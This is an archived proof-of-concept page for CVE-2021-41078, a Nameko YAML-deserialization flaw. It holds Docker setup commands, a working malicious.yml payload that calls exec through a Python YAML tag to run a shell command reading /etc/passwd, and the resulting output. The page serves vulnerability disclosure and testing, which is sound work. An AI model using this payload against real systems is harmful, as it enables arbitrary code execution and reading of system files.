CVE-2021-41078 PoC — Nameko 代码问题漏洞

Source

https://github.com/s-index/CVE-2021-41078

Associated Vulnerability

Title:Nameko 代码问题漏洞 (CVE-2021-41078)
Description:Nameko是一个用于构建微服务的 Python 框架。 Nameko存在安全漏洞，该漏洞源于当反序列化配置文件时，2.13.0中的Nameko可能会被欺骗执行任意代码。

Description

nameko Arbitrary code execution due to YAML deserialization

Readme

# CVE-2021-41078
nameko Arbitrary code execution due to YAML deserialization

## NVD Description

Nameko through 2.13.0 can be tricked into performing arbitrary code execution when deserializing the config file.

## Demo

![cve-2021-41078](https://user-images.githubusercontent.com/56715563/187062984-fb0c5149-92a6-4440-8731-6260465bfc2a.gif)

## Set Up

1. Build an image from a Dockerfile

```
docker build -t cve-2021-41078 .
```

2. Run python main.py in a new container

```
docker run -it --rm cve-2021-41078
```

output /etc/passwd
```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --
```

![output-image](https://user-images.githubusercontent.com/56715563/187062786-f420ceb8-e8be-42ee-989e-b657ede803a1.png)

## PoC Payload

malicious.yml
```
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"
```

## Reference

- https://github.com/nameko/nameko/security/advisories/GHSA-6p52-jr3q-c94g

File Snapshot


 [4.0K]  /data/pocs/8144d75a8fe3f54de1539c8c48d4d7fa165d7302
├── [ 144]  Dockerfile
├── [1.0K]  LICENSE
├── [ 144]  malicious.yml
└── [1.0K]  README.md

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!